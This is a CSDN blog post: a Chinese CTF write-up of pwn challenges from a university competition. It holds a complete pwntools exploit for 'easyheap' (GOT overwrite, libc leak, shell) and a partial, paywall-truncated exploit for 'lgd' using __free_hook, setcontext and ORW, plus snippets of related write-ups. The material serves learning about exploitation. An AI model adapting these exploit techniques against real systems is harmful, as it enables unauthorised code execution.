高校战“疫”网络安全分享赛pwn部分wp

最新推荐文章于 2022-11-05 01:30:34 发布
最新推荐文章于 2022-11-05 01:30:34 发布
阅读量848 收藏 3
点赞数 1
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43116977/article/details/104793414
版权
这篇博客详细介绍了高校战“疫”网络安全分享赛中的pwn题目,包括easyheap、lgd、woodenbox2、EasyVM和Shotest_Path_v2等。作者分享了每道题目的漏洞分析和利用思路,如通过堆溢出劫持got表、利用ORW泄露flag等。总结部分讨论了堆溢出与栈溢出的利用区别,并提到了在有沙盒的情况下如何进行利用。
摘要由CSDN通过智能技术生成

高校战“疫”网络安全分享赛pwn部分wp

博客地址

easyheap

刚复现的第一题,并且在刚开始的时候连洞都找不到…可真是当头一棒。
在这里插入图片描述
漏洞在申请的大小大于0x400时,return。这时ptr[i]没有被释放,接下来就是常规劫持ptr[i]堆块上的指针为got表。修改got表。来实现利用。


```python
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
	elf = ELF(flaag)
	global p
	if(debug == 1):
		p = process(flaag)

	else:
		p = remote(ip,port)
	def add(size,content):
		p.sendlineafter("Your choice:\n","1")
		p.sendlineafter("this message?\n",str(size))
		p.sendafter("content of the message?\n",content)
	def free(index):
		p.sendlineafter("Your choice:\n","2")
		p.sendlineafter("item to be deleted?\n",str(index))
	def edit(index,content):
		p.sendlineafter("Your choice:\n","3")
		p.sendlineafter(" the item to be modified?\n",str(index))
		p.sendafter("content of the message?\n",content)
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	add(0x18,'\xff'*0x18)
	free(0)
	p.sendlineafter("Your choice:\n","1")
	p.sendlineafter("this message?\n",str(0x500))
	p.sendlineafter("Your choice:\n","1")
	p.sendlineafter("this message?\n",str(0x500))
	edit(0,p64(0)+p64(0x21)+p64(0x6020d8))
	edit(1,p64(0x6020f0)+p64(0x602100)+p64(0)+p64(elf.got['free'])+p64(0x200)+p64(0x602108)+'/bin/sh\x00')
	#gdb.attach(p)
	edit(0,p64(0)+p64(0x21)+p64(elf.got['free']))
	edit(1,p64(elf.plt['puts']))
	edit(0,p64(0)+p64(0x21)+p64(elf.got['puts']))
	free(1)
	puts_addr=u64(p.recv(6).ljust(8,'\x00'))
	libcbase_addr=puts_addr-libc.symbols['puts']
	system_addr=libcbase_addr+libc.symbols['system']
	binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
	edit(3,p64(system_addr))
	free(4)
	print "system_addr=>",hex(system_addr)
	print "libcbase_addr=>",hex(libcbase_addr)
	p.interactive()
if __name__ == '__main__':
	pwn('121.36.209.145',9997,0,'./easyheap')

lgd

开沙盒的堆溢出,老实说之前没遇到过这种。
在这里插入图片描述
在edit时read的长度为add时写在bss段字符串的长度。 造成了堆溢出。 利用堆溢出挟持__free_hooksetcontext,从而劫持rsp,rip,从而劫持程序,在利用ORW来泄露flag

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
	elf = ELF(flaag)
	global p
	if(debug == 1):
		p = process(flaag)

	else:
		p = remote(ip,port)
	def add(size,content):
		p.sendlineafter(">> ","1")
		p.sendlineafter("______?\n",str(size))
		p.sendafter("yes_or_no?\n",content)
	def free(index):
		p.sendlineafter(">> ","2")
		p.sendlineafter("index ?\n",str(index))
	def show(index):
		p.sendlineafter(">> ","3")
		p.sendlineafter("index ?\n",str(index))
	def edit(index,content):
		p.sendlineafter(">> ","4")
		p.sendlineafter("index ?\n",str(index))
		p.sendafter("c___new_content ?\n",content)
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	p.sendlineafter("what is your name? \n","aaa")
	add(0x50,"\xff"*0x200)
	add(0xf8,'\xff'*0x200)
	add(0x68,"\xff"*0x200)
	free(1)
	free(2)
	edit(0,"A"*0x58+"B"*8)
	show(0)
	p.recvuntil("BBBBBBBB")
	main_arena=u64(p.recv(6).ljust(8,"\x00"))
	libcbase_addr=main_arena-(0x7f9f177d8b78-0x7f9f17414000)
	free_hook=libcbase_addr+libc.symbols['__free_hook']
	edit(0,"A"*0x58+p64(0x101)+p64(main_arena)+p64(free_hook-0x40)+p64(0)*28+p64(0x100)+p64(0x71)+p64(free_hook-0x33))
	add(0xf8,'\xff'*0x200)
	add(0x68,'\xff'*0x200)
	add(0x68,'\xff'*0x200)
	edit(3,p64(0)*4+'\x00'*3+p64(libcbase_addr+libc.symbols['setcontext']+0x35))
	frame = SigreturnFrame()
	frame.rdi = 0
	frame.rax = 0
	frame.
最低0.47元/天 解锁文章
starssgo
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
高校网络安全分享pwn复盘
doudoudedi
03-10 850
就做了一个pwn我tcl 但是收获很多 woodenbox2 这道题有先是用chunk overlop然后将unsortbin切割到fastbin(此时unsortbin与fastbin指向了同一个堆块)通过堆溢出将低位覆盖为stdout上面的位置然后写IO_FILE结构体leaklibc基址然后通过fastbin attack打malloc_hook即可 IO_FILE结构体的知识可看一下 h...
高校网络安全分享
辰星的博客
03-09 2872
2020情期间高校网络安全分享,个人做出的部分WP。不足之处见谅。 MISC 简单MISC 提示为简单隐写术。附件中一张jpg图片和一个名为flag.zip的加密压缩包,很明显是让我们利用jpg获得密码解压压缩包。 我们猜测这个图片中可能存在.txt文件保存密码,16进制查看器中查看下验证猜想。 在kali中利用binwalk分离出来,并查看 得到莫尔斯码,解码得到密码,解码压缩...
高校网络安全分享-总结
qq_44657899的博客
03-21 1689
ez_mem&usb 提取出来: 00:00:09:00:00:00:00:00 00:00:0F:00:00:00:00:00 00:00:04:00:00:00:00:00 00:00:0A:00:00:00:00:00 00:00:2F:00:00:00:00:00 00:00:23:00:00:00:00:00 00:00:26:00:00:00:00:00 00:00:1F:00...
高校网络安全分享-MISC-隐藏的信息
qq_43390703的博客
03-11 1048
此次攻防世界上的高校网络安全分享有幸分享了一道题目。水平还很菜但是这次经历也对我自我激励也起到了很好的作用。本来想出一道pwn题的但是进了出题群后,乖乖面向大佬自闭,修改题目。。QAQ。 题目说明 Misc-隐藏的信息 WP 首先解压文件,发现一个二维码和一个加密的压缩包。 一般CTF比中都可以通过图片获得压缩包的密码,但是这其实是一个伪加密压缩包。 使用010editor修改文件标...
高校网络安全分享-MISC-ez_mem&usb writeup
weixin_43727482的博客
03-10 714
MISC-ez_mem&usb binwalk发现两个压缩包,提取后但无法打开。 使用Wireshark提取,得到一个镜像文件‘’data.vmem‘’ 使用volatility进行分析 volatility -f data.vmem imageinfo volatility -f data.vmem --profile=WinXPSP2x86 pslist...
2024年首届茂名市网络安全(茂安杯)初部分题目,有crypto、misc、reverse、pwn和moblie的题
最新发布
08-08
适合ctf爱好者或者参加相关茂名市网安的选手观阅,题目简单蛮适合拿来练手的。
2022年中职网络安全天津市任务九-PWN(2)
12-20
1.访问靶机 FSserver登录FTP,找到pwn1文件夹,下载内容进行作答,通过缓冲区溢出 对pwn1靶机进行破解,获取目标靶机 shell得到flag: Flagf}样例: flag{×xxx}。nc pwn1靶机ip 10000 2. 访问靶机FServer登录FTP,...
“东华杯”2021年大学生网络安全邀请.zip
12-07
"东华杯"2021年大学生网络安全邀请是一场旨在提高大学生网络安全技能和意识的重要事。CTF,即Capture The Flag,是网络安全领域的一种竞形式,参者需要运用各种安全技能解决难题,捕获特定的目标("flag")...
长春理工大学第六届网络安全题目
06-15
内有re+web+pwn+misc杂项 博文地址:https://blog.csdn.net/m0_64659074/article/details/123853255?spm=1001.2014.3001.5502
PWN靶机环境 网络安全
05-23
PWN靶机环境
高校网络安全分享 —— Write-up
a3320315的博客
03-30 2382
Guessgame 这道题目当时没做出来,后来复现的时候,发现挺有意思的,题目中主要有三个考点 JS的大小写特征 原型链污染 redos盲注 这儿主要着重介绍一下第三个考点 JS的 exec test RegExp match replace spite可以造成redos盲注 /([a-z]+)+$/.exec('aaaaaaaaaaaaaaaaaaaaaaaaaaaa!'); /Runoo...
四川省网络安全技能大 PWN一题wp
qq_39948058的博客
09-06 856
前言:没做过c++的题,也不知道怎么找漏洞,貌似这道题在id输入大量的数据,当数据爆满时遇到非法的内存数据,会让你重新输入,能够泄露出我们是堆和libc地址 貌似这道题解法是这,难点在泄露,当我们成功泄露出heap,可以利用uaf,进行edit成大堆块进而去打 exp: from pwn import * p=process('./classroom') elf=ELF('./classroom') libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") cont
XCTF高校网络安全分享(隐藏的信息)
hhh
03-14 995
知识点: 双音多频(拨号音隐写) 二维码相关知识 解压完是一个残缺的二维码和一个压缩包。压缩包是加密的,所以我们先看二维码。 二维码很容易看出来需要反色+补上三个小黑块(用于位置探测)(讲真,我以前一直觉得二维码是个很特殊的东西,每一个二维码都是独一无二的,毕竟你看扫出来的东西都不一样嘛……) 这张图片缺少的是位置探测区,这三个小黑块用来确定二维码的大小和位置,帮助我们正确定位二维码里的数...
高校” 天津垓
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-10 2665
查壳 这个程序根据后面的分析是属于自解密一类的的程序, 这个程序在我电脑上跑不起来,搞了半天环境就是跑不起来 算了直接拖入IDA分析 进到入口函数 然后进入sub_100401B2F 接着进入sub_1004011F6(),这个函数是第一个key的check 解密代码 a = "Rising_Hopper!" tt = [17,8,6,10,15,20,42,59,47,3,47,4,16,...
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4710
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
2022祥云杯pwn
m0_63437215的博客
11-05 409
2022祥云杯pwn
高校网络安全分享部分WP
qq_41252520的博客
03-10 1042
文章目录前言Reverse0x0 Cycle graph0x1 天津垓0x2 fxck!PWN0x0 easyheap0x1 woodenbox2 前言 这场团队,我个人进入状态很慢,第一天傍晚才开始做出一道题,这与本次比的题目质量也有关。这次比题目平均质量比I春秋公益要高。作为队伍中的一员,我个人仅贡献出了3道题的分数。另外有2道逆向题各有所惑,感觉只差那一步。后面也会说明一下,...
pwn题堆利用的一些姿势 -- malloc_hook
lifanxin的博客
04-12 4276
  在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell。因此也就有了我这一系列文章的目的,在got表无法被修改时,我们往往利用的就是下面的一些hook+one
pwn的一些技巧与总结
weixin_30477797的博客
09-27 864
原文地址:https://github.com/Naetw/CTF-pwn-tips 目录 溢出 在gdb中寻找字符串 二进制服务 找到libc中特定函数的偏移地址 Find '/bin/sh' or 'sh' in library Leak stack address gdb中的fork问题 Secret of a mysterious section - .tls Predictable R...
2021强网杯网络安全Nu1L Team Writeup分析
"2021强网杯Writeup--by Nu1L Team.pdf" 是一份关于第五届“强网杯”全国网络安全后分析报告,由Nu1L团队编写。报告涵盖了多个网络安全领域的挑,包括CTF(Capture The Flag)竞网络安全信息安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值